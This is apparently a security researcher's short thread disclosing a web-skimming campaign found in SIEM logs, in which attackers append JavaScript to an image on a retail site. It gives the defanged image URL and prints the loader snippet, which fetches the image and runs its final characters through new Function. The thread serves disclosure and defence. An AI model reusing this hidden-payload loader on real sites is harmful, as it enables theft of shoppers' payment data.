A colleague found this a couple of days ago while searching through our SIEM. The skimmer group uploads or modifies an existing image and appends the JS code.
1/5
hxxps://www.truthinaging[.]com/media/wysiwyg/FreeShipping.jpg
2/5
xhr.open('GET', '<image>', true);
xhr.send();
xhr.onreadystatechange = function() {
if (this.readyState != 4) return;
if (this.status == 200) {
var F=new Function (this.responseText.slice(-19704));
return(F());
}
}
3/5
gist.github.com/krautface/dab3…
5/5